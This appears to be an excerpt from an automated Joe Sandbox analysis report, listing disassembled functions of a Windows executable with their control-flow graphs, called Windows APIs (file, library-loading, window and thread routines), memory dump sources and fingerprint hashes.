                                                                                                                                                                                                              control_flow_graph 1125 7ff75fb9a990-7ff75fb9a9ba call 7ff75fbb3900 1128 7ff75fb9a9c7 1125->1128 1129 7ff75fb9a9bc-7ff75fb9a9c0 1125->1129 1130 7ff75fb9a9ca-7ff75fb9aa3e CreateFileW 1128->1130 1129->1128 1131 7ff75fb9a9c2-7ff75fb9a9c5 1129->1131 1132 7ff75fb9aa40-7ff75fb9aa5d GetLastError call 7ff75fb9cbcc 1130->1132 1133 7ff75fb9aa9e-7ff75fb9aaa5 1130->1133 1131->1130 1139 7ff75fb9aa5f-7ff75fb9aa9c CreateFileW GetLastError 1132->1139 1140 7ff75fb9aab2 1132->1140 1135 7ff75fb9aaaa-7ff75fb9aaae 1133->1135 1137 7ff75fb9aab0 1135->1137 1138 7ff75fb9aac5-7ff75fb9aac9 1135->1138 1141 7ff75fb9aab7-7ff75fb9aab9 1137->1141 1142 7ff75fb9aaf8-7ff75fb9ab0c 1138->1142 1143 7ff75fb9aacb-7ff75fb9aacf 1138->1143 1139->1135 1140->1141 1141->1138 1146 7ff75fb9aabb 1141->1146 1144 7ff75fb9ab28-7ff75fb9ab41 1142->1144 1145 7ff75fb9ab0e-7ff75fb9ab24 call 7ff75fba2090 1142->1145 1143->1142 1147 7ff75fb9aad1-7ff75fb9aaf2 SetFileTime 1143->1147 1145->1144 1146->1138 1147->1142
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CreateErrorLast$Time
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1999340476-0
                                                                                                                                                                                                              • Opcode ID: 8e44814639e3e251a22fbd15649f7df57f929efc56a54d2be460b97871a821c6
                                                                                                                                                                                                              • Instruction ID: 0ef1133e77e2220288acda7af431070e97be487f0f761b8013ad930e43a38816
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e44814639e3e251a22fbd15649f7df57f929efc56a54d2be460b97871a821c6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B4127B2A082D286F7349F35E6147EAA691E7807B8F580334DE6D07AC8CF7DC4858B50
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBBFFE4 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1150 7ff75fbbffe4-7ff75fbc003a 1151 7ff75fbc0040-7ff75fbc0043 1150->1151 1152 7ff75fbc0165 1150->1152 1154 7ff75fbc0045-7ff75fbc0048 1151->1154 1155 7ff75fbc004d-7ff75fbc0050 1151->1155 1153 7ff75fbc0167-7ff75fbc0183 1152->1153 1154->1153 1156 7ff75fbc0056-7ff75fbc0064 1155->1156 1157 7ff75fbc00f9 1155->1157 1158 7ff75fbc0066-7ff75fbc0069 1156->1158 1159 7ff75fbc006d-7ff75fbc008c LoadLibraryW 1156->1159 1160 7ff75fbc00fb-7ff75fbc00fe 1157->1160 1163 7ff75fbc00e5-7ff75fbc00ec 1158->1163 1164 7ff75fbc006b 1158->1164 1165 7ff75fbc00ae-7ff75fbc00b8 1159->1165 1166 7ff75fbc008e-7ff75fbc0097 GetLastError 1159->1166 1161 7ff75fbc0100-7ff75fbc010f GetProcAddress 1160->1161 1162 7ff75fbc014a-7ff75fbc015d 1160->1162 1167 7ff75fbc0111-7ff75fbc0138 1161->1167 1168 7ff75fbc0143 1161->1168 1162->1152 1163->1156 1174 7ff75fbc00f2 1163->1174 1169 7ff75fbc00e0-7ff75fbc00e3 1164->1169 1172 7ff75fbc00ba-7ff75fbc00c5 1165->1172 1173 7ff75fbc00c7-7ff75fbc00d5 1165->1173 1170 7ff75fbc0099-7ff75fbc00aa LoadLibraryExW 1166->1170 1171 7ff75fbc00ac 1166->1171 1167->1153 1168->1162 1169->1163 1176 7ff75fbc013a-7ff75fbc0141 1169->1176 1170->1165 1171->1165 1172->1163 1173->1169 1175 7ff75fbc00d7-7ff75fbc00da FreeLibrary 1173->1175 1174->1157 1175->1169 1176->1160
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 190572456-0
                                                                                                                                                                                                              • Opcode ID: 20ec00b8bbb8ad7cdc366cc985b22ae458df1abdd5de5647c756874638a7f503
                                                                                                                                                                                                              • Instruction ID: 88f579b910504491bd82b1e47b5ffcdff4b0e44562a7517db3651f5be55e1057
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 20ec00b8bbb8ad7cdc366cc985b22ae458df1abdd5de5647c756874638a7f503
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C41AF61B0A6C7C1FA15AF2298006F7F292BB54BD4F8F4536ED5D8B688DE3DE4408760
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBAF3C8 Relevance: 7.5, APIs: 5, Instructions: 27windowCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1266772231-0
                                                                                                                                                                                                              • Opcode ID: 3d3cf82f3f77b6a3577993f4a942783953a1b1d866ceaa594716f13b79c5b63a
                                                                                                                                                                                                              • Instruction ID: f3b72bb4544fca60846598180dabebec224aa49eb749d453b068b9e4cb53805c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d3cf82f3f77b6a3577993f4a942783953a1b1d866ceaa594716f13b79c5b63a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4FF0F965B3858282FB64AB31F895BBAE364FF94B05FC81131E68E81864DF2CD109CB10
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBAE8B0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1412 7ff75fbae8b0-7ff75fbae8cf GetClassNameW 1413 7ff75fbae8d1-7ff75fbae8e4 call 7ff75fba3d70 1412->1413 1414 7ff75fbae8fe-7ff75fbae901 1412->1414 1413->1414 1419 7ff75fbae8e6-7ff75fbae8fb FindWindowExW 1413->1419 1416 7ff75fbae911-7ff75fbae919 1414->1416 1417 7ff75fbae903-7ff75fbae90b SHAutoComplete 1414->1417 1417->1416 1419->1414
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                                                                                                              • String ID: EDIT
                                                                                                                                                                                                              • API String ID: 4243998846-3080729518
                                                                                                                                                                                                              • Opcode ID: d693d42ce090d05d3aa9bf52891532b56deb71ca4894e7150c2fcb9f2915c979
                                                                                                                                                                                                              • Instruction ID: 92a9b400abe6a46b813773bd625e7f3698db39c765192120853a5fc4339dd61c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d693d42ce090d05d3aa9bf52891532b56deb71ca4894e7150c2fcb9f2915c979
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35F03A51B1AB87D1FE25AB26B8107F6D395AF48780F8C4030C98D0A694EE2DD109C720
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBB3E0C Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1452418845-0
                                                                                                                                                                                                              • Opcode ID: 199816e0affd3c4072233f956bf8a8c590e6657ab09ceeefaecbb45902478120
                                                                                                                                                                                                              • Instruction ID: 85052780ffc541cddfa8ef250ec1b78bb9d6e9a52d3ca9ad557a47ae3fcd81e3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 199816e0affd3c4072233f956bf8a8c590e6657ab09ceeefaecbb45902478120
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8231F721E881C3C7FA24BB7494622F9A291AF41384FCC4535E94E4B2D7DE6CAD05C239
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FB9A800 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2244327787-0
                                                                                                                                                                                                              • Opcode ID: d7d27f86960c145bd86a2c4a2b2234baced483829e7f4d5c893c94799743c948
                                                                                                                                                                                                              • Instruction ID: 4f10e8114ae59455ca4d5dbdb3d8265520e76251be6613dc957f5ad9f99b74c5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7d27f86960c145bd86a2c4a2b2234baced483829e7f4d5c893c94799743c948
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77219261E18582C5EA607F31A6402BAF368FB41B94F9D4131DA5D46AD4CF2CE8428760
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBA2CD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Thread$CreatePriority
                                                                                                                                                                                                              • String ID: CreateThread failed
                                                                                                                                                                                                              • API String ID: 2610526550-3849766595
                                                                                                                                                                                                              • Opcode ID: 1d607bc94a2565185ea8aed89facb0c396d4a5bb31d92b125af062f9bafc8118
                                                                                                                                                                                                              • Instruction ID: 60ce052228827142345aced639d1366e7e8c3f0b7a2308fc80f28b93ac871672
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d607bc94a2565185ea8aed89facb0c396d4a5bb31d92b125af062f9bafc8118
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A113031A19A86D1EB01EF20E9412EAB360FB84744FD84535D69D42669DF3CE585C760
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBAE930 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26comCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DirectoryInitializeMallocSystem
                                                                                                                                                                                                              • String ID: riched20.dll
                                                                                                                                                                                                              • API String ID: 174490985-3360196438
                                                                                                                                                                                                              • Opcode ID: 94d6016eb76bd2e9fdef82b43f1dfdf966ce3007a75da85a203c47b8bd723e7e
                                                                                                                                                                                                              • Instruction ID: b8a4bed487dcb698d822260925fa151a774725ef88b13187349bf060ae78da0c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 94d6016eb76bd2e9fdef82b43f1dfdf966ce3007a75da85a203c47b8bd723e7e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DAF04F71918A86C2EB01AF20F8152EEF3A4FB98754F880135E68D42A54DF7CD149CB10
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBBFB2C Relevance: 4.7, APIs: 3, Instructions: 238COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWide$AllocateHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2584219951-0
                                                                                                                                                                                                              • Opcode ID: 36d04146fd16ad38f5ae4a9eef0db65d4ef903412864ddda910bbe6c40e99b7c
                                                                                                                                                                                                              • Instruction ID: 9e958510cb44b7c4349668ababf50fadae5221602ba223b20d782cb49e714309
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 36d04146fd16ad38f5ae4a9eef0db65d4ef903412864ddda910bbe6c40e99b7c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0FA1B662B18786C7EB249F71D4403B9A2D1FB88B98F884235DA5D47BC5EF3CD8408714
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBA5608 Relevance: 4.7, APIs: 3, Instructions: 214COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: std::bad_alloc::bad_alloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1875163511-0
                                                                                                                                                                                                              • Opcode ID: 7d6e2ed02b66bbeced6f690ef67be6673874d613937fa3cb223cf6d02c80556f
                                                                                                                                                                                                              • Instruction ID: f49a292b5e8c1772f7fecb87f0bd95f4af904bf196932f2e67f4cf400d1525cb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d6e2ed02b66bbeced6f690ef67be6673874d613937fa3cb223cf6d02c80556f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B81A022A0AAC2C5EB65EE35D5403F9B760EB54B84F9C4031DB8D17B99DF3CE6418324
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FB9B094 Relevance: 4.6, APIs: 3, Instructions: 100fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileWrite$Handle
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4209713984-0
                                                                                                                                                                                                              • Opcode ID: a319676427f459690ec52ac86a757fbd42f7d88e4113bbaacc72b2efb73a18da
                                                                                                                                                                                                              • Instruction ID: faf5c766ebc77464e2a321758bb232aaf8a2afacfcff0651f36459f299c8d16b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a319676427f459690ec52ac86a757fbd42f7d88e4113bbaacc72b2efb73a18da
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA41C726A18696D2EB10EF35E6143FAA371FB44B88F984031DB4D47A94CF3CD645C720
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

